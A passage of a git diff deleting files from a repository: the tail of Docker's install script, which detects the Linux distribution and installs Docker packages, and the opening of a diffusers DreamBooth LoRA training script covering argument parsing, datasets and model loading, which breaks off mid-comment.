;; - 10) - dist_version="buster" - ;; - 9) - dist_version="stretch" - ;; - 8) - dist_version="jessie" - ;; - esac - fi - fi - fi -} - -do_install() { - echo "# Executing docker install script, commit: $SCRIPT_COMMIT_SHA" - - if command_exists docker; then - cat >&2 <<-'EOF' - Warning: the "docker" command appears to already exist on this system. - - If you already have Docker installed, this script can cause trouble, which is - why we're displaying this warning and provide the opportunity to cancel the - installation. - - If you installed the current Docker package using this script and are using it - again to update Docker, you can safely ignore this message. - - You may press Ctrl+C now to abort this script. - EOF - ( set -x; sleep 20 ) - fi - - user="$(id -un 2>/dev/null || true)" - - sh_c='sh -c' - if [ "$user" != 'root' ]; then - if command_exists sudo; then - sh_c='sudo -E sh -c' - elif command_exists su; then - sh_c='su -c' - else - cat >&2 <<-'EOF' - Error: this installer needs the ability to run commands as root. - We are unable to find either "sudo" or "su" available to make this happen. - EOF - exit 1 - fi - fi - - if is_dry_run; then - sh_c="echo" - fi - - # perform some very rudimentary platform detection - lsb_dist=$( get_distribution ) - lsb_dist="$(echo "$lsb_dist" | tr '[:upper:]' '[:lower:]')" - - if is_wsl; then - echo - echo "WSL DETECTED: We recommend using Docker Desktop for Windows." - echo "Please get Docker Desktop from https://www.docker.com/products/docker-desktop/" - echo - cat >&2 <<-'EOF' - - You may press Ctrl+C now to abort this script. - EOF - ( set -x; sleep 20 ) - fi - - case "$lsb_dist" in - - ubuntu) - if command_exists lsb_release; then - dist_version="$(lsb_release --codename | cut -f2)" - fi - if [ -z "$dist_version" ] && [ -r /etc/lsb-release ]; then - dist_version="$(. /etc/lsb-release && echo "$DISTRIB_CODENAME")" - fi - ;; - - debian|raspbian) - dist_version="$(sed 's/\/.*//' /etc/debian_version | sed 's/\..*//')" - case "$dist_version" in - 12) - dist_version="bookworm" - ;; - 11) - dist_version="bullseye" - ;; - 10) - dist_version="buster" - ;; - 9) - dist_version="stretch" - ;; - 8) - dist_version="jessie" - ;; - esac - ;; - - centos|rhel|sles) - if [ -z "$dist_version" ] && [ -r /etc/os-release ]; then - dist_version="$(. /etc/os-release && echo "$VERSION_ID")" - fi - ;; - - *) - if command_exists lsb_release; then - dist_version="$(lsb_release --release | cut -f2)" - fi - if [ -z "$dist_version" ] && [ -r /etc/os-release ]; then - dist_version="$(. /etc/os-release && echo "$VERSION_ID")" - fi - ;; - - esac - - # Check if this is a forked Linux distro - check_forked - - # Print deprecation warnings for distro versions that recently reached EOL, - # but may still be commonly used (especially LTS versions). - case "$lsb_dist.$dist_version" in - debian.stretch|debian.jessie) - deprecation_notice "$lsb_dist" "$dist_version" - ;; - raspbian.stretch|raspbian.jessie) - deprecation_notice "$lsb_dist" "$dist_version" - ;; - ubuntu.xenial|ubuntu.trusty) - deprecation_notice "$lsb_dist" "$dist_version" - ;; - ubuntu.impish|ubuntu.hirsute|ubuntu.groovy|ubuntu.eoan|ubuntu.disco|ubuntu.cosmic) - deprecation_notice "$lsb_dist" "$dist_version" - ;; - fedora.*) - if [ "$dist_version" -lt 36 ]; then - deprecation_notice "$lsb_dist" "$dist_version" - fi - ;; - esac - - # Run setup for each distro accordingly - case "$lsb_dist" in - ubuntu|debian|raspbian) - pre_reqs="apt-transport-https ca-certificates curl" - if ! command -v gpg > /dev/null; then - pre_reqs="$pre_reqs gnupg" - fi - apt_repo="deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] $DOWNLOAD_URL/linux/$lsb_dist $dist_version $CHANNEL" - ( - if ! is_dry_run; then - set -x - fi - $sh_c 'apt-get update -qq >/dev/null' - $sh_c "DEBIAN_FRONTEND=noninteractive apt-get install -y -qq $pre_reqs >/dev/null" - $sh_c 'install -m 0755 -d /etc/apt/keyrings' - $sh_c "curl -fsSL \"$DOWNLOAD_URL/linux/$lsb_dist/gpg\" | gpg --dearmor --yes -o /etc/apt/keyrings/docker.gpg" - $sh_c "chmod a+r /etc/apt/keyrings/docker.gpg" - $sh_c "echo \"$apt_repo\" > /etc/apt/sources.list.d/docker.list" - $sh_c 'apt-get update -qq >/dev/null' - ) - pkg_version="" - if [ -n "$VERSION" ]; then - if is_dry_run; then - echo "# WARNING: VERSION pinning is not supported in DRY_RUN" - else - # Will work for incomplete versions IE (17.12), but may not actually grab the "latest" if in the test channel - pkg_pattern="$(echo "$VERSION" | sed 's/-ce-/~ce~.*/g' | sed 's/-/.*/g')" - search_command="apt-cache madison docker-ce | grep '$pkg_pattern' | head -1 | awk '{\$1=\$1};1' | cut -d' ' -f 3" - pkg_version="$($sh_c "$search_command")" - echo "INFO: Searching repository for VERSION '$VERSION'" - echo "INFO: $search_command" - if [ -z "$pkg_version" ]; then - echo - echo "ERROR: '$VERSION' not found amongst apt-cache madison results" - echo - exit 1 - fi - if version_gte "18.09"; then - search_command="apt-cache madison docker-ce-cli | grep '$pkg_pattern' | head -1 | awk '{\$1=\$1};1' | cut -d' ' -f 3" - echo "INFO: $search_command" - cli_pkg_version="=$($sh_c "$search_command")" - fi - pkg_version="=$pkg_version" - fi - fi - ( - pkgs="docker-ce${pkg_version%=}" - if version_gte "18.09"; then - # older versions didn't ship the cli and containerd as separate packages - pkgs="$pkgs docker-ce-cli${cli_pkg_version%=} containerd.io" - fi - if version_gte "20.10"; then - pkgs="$pkgs docker-compose-plugin docker-ce-rootless-extras$pkg_version" - fi - if version_gte "23.0"; then - pkgs="$pkgs docker-buildx-plugin" - fi - if ! is_dry_run; then - set -x - fi - $sh_c "DEBIAN_FRONTEND=noninteractive apt-get install -y -qq $pkgs >/dev/null" - ) - echo_docker_as_nonroot - exit 0 - ;; - centos|fedora|rhel) - if [ "$(uname -m)" != "s390x" ] && [ "$lsb_dist" = "rhel" ]; then - echo "Packages for RHEL are currently only available for s390x." - exit 1 - fi - if [ "$lsb_dist" = "fedora" ]; then - pkg_manager="dnf" - config_manager="dnf config-manager" - enable_channel_flag="--set-enabled" - disable_channel_flag="--set-disabled" - pre_reqs="dnf-plugins-core" - pkg_suffix="fc$dist_version" - else - pkg_manager="yum" - config_manager="yum-config-manager" - enable_channel_flag="--enable" - disable_channel_flag="--disable" - pre_reqs="yum-utils" - pkg_suffix="el" - fi - repo_file_url="$DOWNLOAD_URL/linux/$lsb_dist/$REPO_FILE" - ( - if ! is_dry_run; then - set -x - fi - $sh_c "$pkg_manager install -y -q $pre_reqs" - $sh_c "$config_manager --add-repo $repo_file_url" - - if [ "$CHANNEL" != "stable" ]; then - $sh_c "$config_manager $disable_channel_flag 'docker-ce-*'" - $sh_c "$config_manager $enable_channel_flag 'docker-ce-$CHANNEL'" - fi - $sh_c "$pkg_manager makecache" - ) - pkg_version="" - if [ -n "$VERSION" ]; then - if is_dry_run; then - echo "# WARNING: VERSION pinning is not supported in DRY_RUN" - else - pkg_pattern="$(echo "$VERSION" | sed 's/-ce-/\\\\.ce.*/g' | sed 's/-/.*/g').*$pkg_suffix" - search_command="$pkg_manager list --showduplicates docker-ce | grep '$pkg_pattern' | tail -1 | awk '{print \$2}'" - pkg_version="$($sh_c "$search_command")" - echo "INFO: Searching repository for VERSION '$VERSION'" - echo "INFO: $search_command" - if [ -z "$pkg_version" ]; then - echo - echo "ERROR: '$VERSION' not found amongst $pkg_manager list results" - echo - exit 1 - fi - if version_gte "18.09"; then - # older versions don't support a cli package - search_command="$pkg_manager list --showduplicates docker-ce-cli | grep '$pkg_pattern' | tail -1 | awk '{print \$2}'" - cli_pkg_version="$($sh_c "$search_command" | cut -d':' -f 2)" - fi - # Cut out the epoch and prefix with a '-' - pkg_version="-$(echo "$pkg_version" | cut -d':' -f 2)" - fi - fi - ( - pkgs="docker-ce$pkg_version" - if version_gte "18.09"; then - # older versions didn't ship the cli and containerd as separate packages - if [ -n "$cli_pkg_version" ]; then - pkgs="$pkgs docker-ce-cli-$cli_pkg_version containerd.io" - else - pkgs="$pkgs docker-ce-cli containerd.io" - fi - fi - if version_gte "20.10"; then - pkgs="$pkgs docker-compose-plugin docker-ce-rootless-extras$pkg_version" - fi - if version_gte "23.0"; then - pkgs="$pkgs docker-buildx-plugin" - fi - if ! is_dry_run; then - set -x - fi - $sh_c "$pkg_manager install -y -q $pkgs" - ) - echo_docker_as_nonroot - exit 0 - ;; - sles) - if [ "$(uname -m)" != "s390x" ]; then - echo "Packages for SLES are currently only available for s390x" - exit 1 - fi - if [ "$dist_version" = "15.3" ]; then - sles_version="SLE_15_SP3" - else - sles_minor_version="${dist_version##*.}" - sles_version="15.$sles_minor_version" - fi - repo_file_url="$DOWNLOAD_URL/linux/$lsb_dist/$REPO_FILE" - pre_reqs="ca-certificates curl libseccomp2 awk" - ( - if ! is_dry_run; then - set -x - fi - $sh_c "zypper install -y $pre_reqs" - $sh_c "zypper addrepo $repo_file_url" - if ! is_dry_run; then - cat >&2 <<-'EOF' - WARNING!! - openSUSE repository (https://download.opensuse.org/repositories/security:SELinux) will be enabled now. - Do you wish to continue? - You may press Ctrl+C now to abort this script. - EOF - ( set -x; sleep 30 ) - fi - opensuse_repo="https://download.opensuse.org/repositories/security:SELinux/$sles_version/security:SELinux.repo" - $sh_c "zypper addrepo $opensuse_repo" - $sh_c "zypper --gpg-auto-import-keys refresh" - $sh_c "zypper lr -d" - ) - pkg_version="" - if [ -n "$VERSION" ]; then - if is_dry_run; then - echo "# WARNING: VERSION pinning is not supported in DRY_RUN" - else - pkg_pattern="$(echo "$VERSION" | sed 's/-ce-/\\\\.ce.*/g' | sed 's/-/.*/g')" - search_command="zypper search -s --match-exact 'docker-ce' | grep '$pkg_pattern' | tail -1 | awk '{print \$6}'" - pkg_version="$($sh_c "$search_command")" - echo "INFO: Searching repository for VERSION '$VERSION'" - echo "INFO: $search_command" - if [ -z "$pkg_version" ]; then - echo - echo "ERROR: '$VERSION' not found amongst zypper list results" - echo - exit 1 - fi - search_command="zypper search -s --match-exact 'docker-ce-cli' | grep '$pkg_pattern' | tail -1 | awk '{print \$6}'" - # It's okay for cli_pkg_version to be blank, since older versions don't support a cli package - cli_pkg_version="$($sh_c "$search_command")" - pkg_version="-$pkg_version" - fi - fi - ( - pkgs="docker-ce$pkg_version" - if version_gte "18.09"; then - if [ -n "$cli_pkg_version" ]; then - # older versions didn't ship the cli and containerd as separate packages - pkgs="$pkgs docker-ce-cli-$cli_pkg_version containerd.io" - else - pkgs="$pkgs docker-ce-cli containerd.io" - fi - fi - if version_gte "20.10"; then - pkgs="$pkgs docker-compose-plugin docker-ce-rootless-extras$pkg_version" - fi - if version_gte "23.0"; then - pkgs="$pkgs docker-buildx-plugin" - fi - if ! is_dry_run; then - set -x - fi - $sh_c "zypper -q install -y $pkgs" - ) - echo_docker_as_nonroot - exit 0 - ;; - *) - if [ -z "$lsb_dist" ]; then - if is_darwin; then - echo - echo "ERROR: Unsupported operating system 'macOS'" - echo "Please get Docker Desktop from https://www.docker.com/products/docker-desktop" - echo - exit 1 - fi - fi - echo - echo "ERROR: Unsupported distribution '$lsb_dist'" - echo - exit 1 - ;; - esac - exit 1 -} - -# wrapped up in a function so that we have some protection against only getting -# half the file during "curl | sh" -do_install diff --git a/spaces/luodian/LoRA-DreamBooth-Training-UI/train_dreambooth_lora.py b/spaces/luodian/LoRA-DreamBooth-Training-UI/train_dreambooth_lora.py deleted file mode 100644 index 93d429590ca4f357aff07989965b673bdf1e50fe..0000000000000000000000000000000000000000 --- a/spaces/luodian/LoRA-DreamBooth-Training-UI/train_dreambooth_lora.py +++ /dev/null @@ -1,1026 +0,0 @@ -#!/usr/bin/env python -# coding=utf-8 -# -# This file is adapted from https://github.com/huggingface/diffusers/blob/febaf863026bd014b7a14349336544fc109d0f57/examples/dreambooth/train_dreambooth_lora.py -# The original license is as below: -# -# Copyright 2022 The HuggingFace Inc. team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and - -import argparse -import hashlib -import logging -import math -import os -import warnings -from pathlib import Path -from typing import Optional - -import numpy as np -import torch -import torch.nn.functional as F -import torch.utils.checkpoint -from torch.utils.data import Dataset - -import datasets -import diffusers -import transformers -from accelerate import Accelerator -from accelerate.logging import get_logger -from accelerate.utils import set_seed -from diffusers import ( - AutoencoderKL, - DDPMScheduler, - DiffusionPipeline, - DPMSolverMultistepScheduler, - UNet2DConditionModel, -) -from diffusers.loaders import AttnProcsLayers -from diffusers.models.cross_attention import LoRACrossAttnProcessor -from diffusers.optimization import get_scheduler -from diffusers.utils import check_min_version, is_wandb_available -from diffusers.utils.import_utils import is_xformers_available -from huggingface_hub import HfFolder, Repository, create_repo, whoami -from PIL import Image -from torchvision import transforms -from tqdm.auto import tqdm -from transformers import AutoTokenizer, PretrainedConfig - - -# Will error if the minimal version of diffusers is not installed. Remove at your own risks. -check_min_version("0.12.0.dev0") - -logger = get_logger(__name__) - - -def save_model_card(repo_name, images=None, base_model=str, prompt=str, repo_folder=None): - img_str = "" - for i, image in enumerate(images): - image.save(os.path.join(repo_folder, f"image_{i}.png")) - img_str += f"![img_{i}](./image_{i}.png)\n" - - yaml = f""" ---- -license: creativeml-openrail-m -base_model: {base_model} -tags: -- stable-diffusion -- stable-diffusion-diffusers -- text-to-image -- diffusers -- lora -inference: true ---- - """ - model_card = f""" -# LoRA DreamBooth - {repo_name} - -These are LoRA adaption weights for {repo_name}. The weights were trained on {prompt} using [DreamBooth](https://dreambooth.github.io/). You can find some example images in the following. \n -{img_str} -""" - with open(os.path.join(repo_folder, "README.md"), "w") as f: - f.write(yaml + model_card) - - -def import_model_class_from_model_name_or_path(pretrained_model_name_or_path: str, revision: str): - text_encoder_config = PretrainedConfig.from_pretrained( - pretrained_model_name_or_path, - subfolder="text_encoder", - revision=revision, - ) - model_class = text_encoder_config.architectures[0] - - if model_class == "CLIPTextModel": - from transformers import CLIPTextModel - - return CLIPTextModel - elif model_class == "RobertaSeriesModelWithTransformation": - from diffusers.pipelines.alt_diffusion.modeling_roberta_series import RobertaSeriesModelWithTransformation - - return RobertaSeriesModelWithTransformation - else: - raise ValueError(f"{model_class} is not supported.") - - -def parse_args(input_args=None): - parser = argparse.ArgumentParser(description="Simple example of a training script.") - parser.add_argument( - "--pretrained_model_name_or_path", - type=str, - default=None, - required=True, - help="Path to pretrained model or model identifier from huggingface.co/models.", - ) - parser.add_argument( - "--revision", - type=str, - default=None, - required=False, - help="Revision of pretrained model identifier from huggingface.co/models.", - ) - parser.add_argument( - "--tokenizer_name", - type=str, - default=None, - help="Pretrained tokenizer name or path if not the same as model_name", - ) - parser.add_argument( - "--instance_data_dir", - type=str, - default=None, - required=True, - help="A folder containing the training data of instance images.", - ) - parser.add_argument( - "--class_data_dir", - type=str, - default=None, - required=False, - help="A folder containing the training data of class images.", - ) - parser.add_argument( - "--instance_prompt", - type=str, - default=None, - required=True, - help="The prompt with identifier specifying the instance", - ) - parser.add_argument( - "--class_prompt", - type=str, - default=None, - help="The prompt to specify images in the same class as provided instance images.", - ) - parser.add_argument( - "--validation_prompt", - type=str, - default=None, - help="A prompt that is used during validation to verify that the model is learning.", - ) - parser.add_argument( - "--num_validation_images", - type=int, - default=4, - help="Number of images that should be generated during validation with `validation_prompt`.", - ) - parser.add_argument( - "--validation_epochs", - type=int, - default=50, - help=( - "Run dreambooth validation every X epochs. Dreambooth validation consists of running the prompt" - " `args.validation_prompt` multiple times: `args.num_validation_images`." - ), - ) - parser.add_argument( - "--with_prior_preservation", - default=False, - action="store_true", - help="Flag to add prior preservation loss.", - ) - parser.add_argument("--prior_loss_weight", type=float, default=1.0, help="The weight of prior preservation loss.") - parser.add_argument( - "--num_class_images", - type=int, - default=100, - help=( - "Minimal class images for prior preservation loss. If there are not enough images already present in" - " class_data_dir, additional images will be sampled with class_prompt." - ), - ) - parser.add_argument( - "--output_dir", - type=str, - default="lora-dreambooth-model", - help="The output directory where the model predictions and checkpoints will be written.", - ) - parser.add_argument("--seed", type=int, default=None, help="A seed for reproducible training.") - parser.add_argument( - "--resolution", - type=int, - default=512, - help=( - "The resolution for input images, all the images in the train/validation dataset will be resized to this" - " resolution" - ), - ) - parser.add_argument( - "--center_crop", - default=False, - action="store_true", - help=( - "Whether to center crop the input images to the resolution. If not set, the images will be randomly" - " cropped. The images will be resized to the resolution first before cropping." - ), - ) - parser.add_argument( - "--train_batch_size", type=int, default=4, help="Batch size (per device) for the training dataloader." - ) - parser.add_argument( - "--sample_batch_size", type=int, default=4, help="Batch size (per device) for sampling images." - ) - parser.add_argument("--num_train_epochs", type=int, default=1) - parser.add_argument( - "--max_train_steps", - type=int, - default=None, - help="Total number of training steps to perform. If provided, overrides num_train_epochs.", - ) - parser.add_argument( - "--checkpointing_steps", - type=int, - default=500, - help=( - "Save a checkpoint of the training state every X updates. These checkpoints can be used both as final" - " checkpoints in case they are better than the last checkpoint, and are also suitable for resuming" - " training using `--resume_from_checkpoint`." - ), - ) - parser.add_argument( - "--resume_from_checkpoint", - type=str, - default=None, - help=( - "Whether training should be resumed from a previous checkpoint. Use a path saved by" - ' `--checkpointing_steps`, or `"latest"` to automatically select the last available checkpoint.' - ), - ) - parser.add_argument( - "--gradient_accumulation_steps", - type=int, - default=1, - help="Number of updates steps to accumulate before performing a backward/update pass.", - ) - parser.add_argument( - "--gradient_checkpointing", - action="store_true", - help="Whether or not to use gradient checkpointing to save memory at the expense of slower backward pass.", - ) - parser.add_argument( - "--learning_rate", - type=float, - default=5e-4, - help="Initial learning rate (after the potential warmup period) to use.", - ) - parser.add_argument( - "--scale_lr", - action="store_true", - default=False, - help="Scale the learning rate by the number of GPUs, gradient accumulation steps, and batch size.", - ) - parser.add_argument( - "--lr_scheduler", - type=str, - default="constant", - help=( - 'The scheduler type to use. Choose between ["linear", "cosine", "cosine_with_restarts", "polynomial",' - ' "constant", "constant_with_warmup"]' - ), - ) - parser.add_argument( - "--lr_warmup_steps", type=int, default=500, help="Number of steps for the warmup in the lr scheduler." - ) - parser.add_argument( - "--lr_num_cycles", - type=int, - default=1, - help="Number of hard resets of the lr in cosine_with_restarts scheduler.", - ) - parser.add_argument("--lr_power", type=float, default=1.0, help="Power factor of the polynomial scheduler.") - parser.add_argument( - "--dataloader_num_workers", - type=int, - default=0, - help=( - "Number of subprocesses to use for data loading. 0 means that the data will be loaded in the main process." - ), - ) - parser.add_argument( - "--use_8bit_adam", action="store_true", help="Whether or not to use 8-bit Adam from bitsandbytes." - ) - parser.add_argument("--adam_beta1", type=float, default=0.9, help="The beta1 parameter for the Adam optimizer.") - parser.add_argument("--adam_beta2", type=float, default=0.999, help="The beta2 parameter for the Adam optimizer.") - parser.add_argument("--adam_weight_decay", type=float, default=1e-2, help="Weight decay to use.") - parser.add_argument("--adam_epsilon", type=float, default=1e-08, help="Epsilon value for the Adam optimizer") - parser.add_argument("--max_grad_norm", default=1.0, type=float, help="Max gradient norm.") - parser.add_argument("--push_to_hub", action="store_true", help="Whether or not to push the model to the Hub.") - parser.add_argument("--hub_token", type=str, default=None, help="The token to use to push to the Model Hub.") - parser.add_argument( - "--hub_model_id", - type=str, - default=None, - help="The name of the repository to keep in sync with the local `output_dir`.", - ) - parser.add_argument( - "--logging_dir", - type=str, - default="logs", - help=( - "[TensorBoard](https://www.tensorflow.org/tensorboard) log directory. Will default to" - " *output_dir/runs/**CURRENT_DATETIME_HOSTNAME***." - ), - ) - parser.add_argument( - "--allow_tf32", - action="store_true", - help=( - "Whether or not to allow TF32 on Ampere GPUs. Can be used to speed up training. For more information, see" - " https://pytorch.org/docs/stable/notes/cuda.html#tensorfloat-32-tf32-on-ampere-devices" - ), - ) - parser.add_argument( - "--report_to", - type=str, - default="tensorboard", - help=( - 'The integration to report the results and logs to. Supported platforms are `"tensorboard"`' - ' (default), `"wandb"` and `"comet_ml"`. Use `"all"` to report to all integrations.' - ), - ) - parser.add_argument( - "--mixed_precision", - type=str, - default=None, - choices=["no", "fp16", "bf16"], - help=( - "Whether to use mixed precision. Choose between fp16 and bf16 (bfloat16). Bf16 requires PyTorch >=" - " 1.10.and an Nvidia Ampere GPU. Default to the value of accelerate config of the current system or the" - " flag passed with the `accelerate.launch` command. Use this argument to override the accelerate config." - ), - ) - parser.add_argument( - "--prior_generation_precision", - type=str, - default=None, - choices=["no", "fp32", "fp16", "bf16"], - help=( - "Choose prior generation precision between fp32, fp16 and bf16 (bfloat16). Bf16 requires PyTorch >=" - " 1.10.and an Nvidia Ampere GPU. Default to fp16 if a GPU is available else fp32." - ), - ) - parser.add_argument("--local_rank", type=int, default=-1, help="For distributed training: local_rank") - parser.add_argument( - "--enable_xformers_memory_efficient_attention", action="store_true", help="Whether or not to use xformers." - ) - - if input_args is not None: - args = parser.parse_args(input_args) - else: - args = parser.parse_args() - - env_local_rank = int(os.environ.get("LOCAL_RANK", -1)) - if env_local_rank != -1 and env_local_rank != args.local_rank: - args.local_rank = env_local_rank - - if args.with_prior_preservation: - if args.class_data_dir is None: - raise ValueError("You must specify a data directory for class images.") - if args.class_prompt is None: - raise ValueError("You must specify prompt for class images.") - else: - # logger is not available yet - if args.class_data_dir is not None: - warnings.warn("You need not use --class_data_dir without --with_prior_preservation.") - if args.class_prompt is not None: - warnings.warn("You need not use --class_prompt without --with_prior_preservation.") - - return args - - -class DreamBoothDataset(Dataset): - """ - A dataset to prepare the instance and class images with the prompts for fine-tuning the model. - It pre-processes the images and the tokenizes prompts. - """ - - def __init__( - self, - instance_data_root, - instance_prompt, - tokenizer, - class_data_root=None, - class_prompt=None, - size=512, - center_crop=False, - ): - self.size = size - self.center_crop = center_crop - self.tokenizer = tokenizer - - self.instance_data_root = Path(instance_data_root) - if not self.instance_data_root.exists(): - raise ValueError("Instance images root doesn't exists.") - - self.instance_images_path = list(Path(instance_data_root).iterdir()) - self.num_instance_images = len(self.instance_images_path) - self.instance_prompt = instance_prompt - self._length = self.num_instance_images - - if class_data_root is not None: - self.class_data_root = Path(class_data_root) - self.class_data_root.mkdir(parents=True, exist_ok=True) - self.class_images_path = list(self.class_data_root.iterdir()) - self.num_class_images = len(self.class_images_path) - self._length = max(self.num_class_images, self.num_instance_images) - self.class_prompt = class_prompt - else: - self.class_data_root = None - - self.image_transforms = transforms.Compose( - [ - transforms.Resize(size, interpolation=transforms.InterpolationMode.BILINEAR), - transforms.CenterCrop(size) if center_crop else transforms.RandomCrop(size), - transforms.ToTensor(), - transforms.Normalize([0.5], [0.5]), - ] - ) - - def __len__(self): - return self._length - - def __getitem__(self, index): - example = {} - instance_image = Image.open(self.instance_images_path[index % self.num_instance_images]) - if not instance_image.mode == "RGB": - instance_image = instance_image.convert("RGB") - example["instance_images"] = self.image_transforms(instance_image) - example["instance_prompt_ids"] = self.tokenizer( - self.instance_prompt, - truncation=True, - padding="max_length", - max_length=self.tokenizer.model_max_length, - return_tensors="pt", - ).input_ids - - if self.class_data_root: - class_image = Image.open(self.class_images_path[index % self.num_class_images]) - if not class_image.mode == "RGB": - class_image = class_image.convert("RGB") - example["class_images"] = self.image_transforms(class_image) - example["class_prompt_ids"] = self.tokenizer( - self.class_prompt, - truncation=True, - padding="max_length", - max_length=self.tokenizer.model_max_length, - return_tensors="pt", - ).input_ids - - return example - - -def collate_fn(examples, with_prior_preservation=False): - input_ids = [example["instance_prompt_ids"] for example in examples] - pixel_values = [example["instance_images"] for example in examples] - - # Concat class and instance examples for prior preservation. - # We do this to avoid doing two forward passes. - if with_prior_preservation: - input_ids += [example["class_prompt_ids"] for example in examples] - pixel_values += [example["class_images"] for example in examples] - - pixel_values = torch.stack(pixel_values) - pixel_values = pixel_values.to(memory_format=torch.contiguous_format).float() - - input_ids = torch.cat(input_ids, dim=0) - - batch = { - "input_ids": input_ids, - "pixel_values": pixel_values, - } - return batch - - -class PromptDataset(Dataset): - "A simple dataset to prepare the prompts to generate class images on multiple GPUs." - - def __init__(self, prompt, num_samples): - self.prompt = prompt - self.num_samples = num_samples - - def __len__(self): - return self.num_samples - - def __getitem__(self, index): - example = {} - example["prompt"] = self.prompt - example["index"] = index - return example - - -def get_full_repo_name(model_id: str, organization: Optional[str] = None, token: Optional[str] = None): - if token is None: - token = HfFolder.get_token() - if organization is None: - username = whoami(token)["name"] - return f"{username}/{model_id}" - else: - return f"{organization}/{model_id}" - - -def main(args): - logging_dir = Path(args.output_dir, args.logging_dir) - - accelerator = Accelerator( - gradient_accumulation_steps=args.gradient_accumulation_steps, - mixed_precision=args.mixed_precision, - log_with=args.report_to, - logging_dir=logging_dir, - ) - - if args.report_to == "wandb": - if not is_wandb_available(): - raise ImportError("Make sure to install wandb if you want to use it for logging during training.") - import wandb - - # Currently, it's not possible to do gradient accumulation when training two models with accelerate.accumulate - # This will be enabled soon in accelerate. For now, we don't allow gradient accumulation when training two models. - # TODO (patil-suraj): Remove this check when gradient accumulation with two models is enabled in accelerate. - # Make one log on every process with the configuration for debugging. - logging.basicConfig( - format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", - datefmt="%m/%d/%Y %H:%M:%S", - level=logging.INFO, - ) - logger.info(accelerator.state, main_process_only=False) - if accelerator.is_local_main_process: - datasets.utils.logging.set_verbosity_warning() - transformers.utils.logging.set_verbosity_warning() - diffusers.utils.logging.set_verbosity_info() - else: - datasets.utils.logging.set_verbosity_error() - transformers.utils.logging.set_verbosity_error() - diffusers.utils.logging.set_verbosity_error() - - # If passed along, set the training seed now. - if args.seed is not None: - set_seed(args.seed) - - # Generate class images if prior preservation is enabled. - if args.with_prior_preservation: - class_images_dir = Path(args.class_data_dir) - if not class_images_dir.exists(): - class_images_dir.mkdir(parents=True) - cur_class_images = len(list(class_images_dir.iterdir())) - - if cur_class_images < args.num_class_images: - torch_dtype = torch.float16 if accelerator.device.type == "cuda" else torch.float32 - if args.prior_generation_precision == "fp32": - torch_dtype = torch.float32 - elif args.prior_generation_precision == "fp16": - torch_dtype = torch.float16 - elif args.prior_generation_precision == "bf16": - torch_dtype = torch.bfloat16 - pipeline = DiffusionPipeline.from_pretrained( - args.pretrained_model_name_or_path, - torch_dtype=torch_dtype, - safety_checker=None, - revision=args.revision, - ) - pipeline.set_progress_bar_config(disable=True) - - num_new_images = args.num_class_images - cur_class_images - logger.info(f"Number of class images to sample: {num_new_images}.") - - sample_dataset = PromptDataset(args.class_prompt, num_new_images) - sample_dataloader = torch.utils.data.DataLoader(sample_dataset, batch_size=args.sample_batch_size) - - sample_dataloader = accelerator.prepare(sample_dataloader) - pipeline.to(accelerator.device) - - for example in tqdm( - sample_dataloader, desc="Generating class images", disable=not accelerator.is_local_main_process - ): - images = pipeline(example["prompt"]).images - - for i, image in enumerate(images): - hash_image = hashlib.sha1(image.tobytes()).hexdigest() - image_filename = class_images_dir / f"{example['index'][i] + cur_class_images}-{hash_image}.jpg" - image.save(image_filename) - - del pipeline - if torch.cuda.is_available(): - torch.cuda.empty_cache() - - # Handle the repository creation - if accelerator.is_main_process: - if args.push_to_hub: - if args.hub_model_id is None: - repo_name = get_full_repo_name(Path(args.output_dir).name, token=args.hub_token) - else: - repo_name = args.hub_model_id - - create_repo(repo_name, exist_ok=True, token=args.hub_token) - repo = Repository(args.output_dir, clone_from=repo_name, token=args.hub_token) - - with open(os.path.join(args.output_dir, ".gitignore"), "w+") as gitignore: - if "step_*" not in gitignore: - gitignore.write("step_*\n") - if "epoch_*" not in gitignore: - gitignore.write("epoch_*\n") - elif args.output_dir is not None: - os.makedirs(args.output_dir, exist_ok=True) - - # Load the tokenizer - if args.tokenizer_name: - tokenizer = AutoTokenizer.from_pretrained(args.tokenizer_name, revision=args.revision, use_fast=False) - elif args.pretrained_model_name_or_path: - tokenizer = AutoTokenizer.from_pretrained( - args.pretrained_model_name_or_path, - subfolder="tokenizer", - revision=args.revision, - use_fast=False, - ) - - # import correct text encoder class - text_encoder_cls = import_model_class_from_model_name_or_path(args.pretrained_model_name_or_path, args.revision) - - # Load scheduler and models - noise_scheduler = DDPMScheduler.from_pretrained(args.pretrained_model_name_or_path, subfolder="scheduler") - text_encoder = text_encoder_cls.from_pretrained( - args.pretrained_model_name_or_path, subfolder="text_encoder", revision=args.revision - ) - vae = AutoencoderKL.from_pretrained(args.pretrained_model_name_or_path, subfolder="vae", revision=args.revision) - unet = UNet2DConditionModel.from_pretrained( - args.pretrained_model_name_or_path, subfolder="unet", revision=args.revision - ) - - # We only train the additional adapter LoRA layers - vae.requires_grad_(False) - text_encoder.requires_grad_(False) - unet.requires_grad_(False) - - # For mixed precision training we cast the text_encoder and vae weights to half-precision - # as these models are only used for inference, keeping weights in full precision is not required. - weight_dtype = torch.float32 - if accelerator.mixed_precision == "fp16": - weight_dtype = torch.float16 - elif accelerator.mixed_precision == "bf16": - weight_dtype = torch.bfloat16 - - # Move unet, vae and text_encoder to device and cast to weight_dtype - unet.to(accelerator.device, dtype=weight_dtype) - vae.to(accelerator.device, dtype=weight_dtype) - text_encoder.to(accelerator.device, dtype=weight_dtype) - - if args.enable_xformers_memory_efficient_attention: - if is_xformers_available(): - unet.enable_xformers_memory_efficient_attention() - else: - raise ValueError("xformers is not available. Make sure it is installed correctly") - - # now we will add new LoRA weights to the attention layers - # It's important to realize here how many attention weights will be added and of which sizes - # The sizes of the attention layers consist only of two different variables: - # 1) - the "hidden_size", which is increased according to `unet.config.block_out_channels`. - # 2) - the "cross attention size", which is set to `unet.config.cross_attention_dim`. - - # Let's first see how many attention processors we will have to set. - # For Stable Diffusion, it should be equal to: - # - down blocks (2x attention layers) * (2x transformer layers) * (3x down blocks) = 12 - # - mid blocks (2x attention layers) * (1x transformer layers) * (1x mid blocks) = 2 - # - up blocks (2x 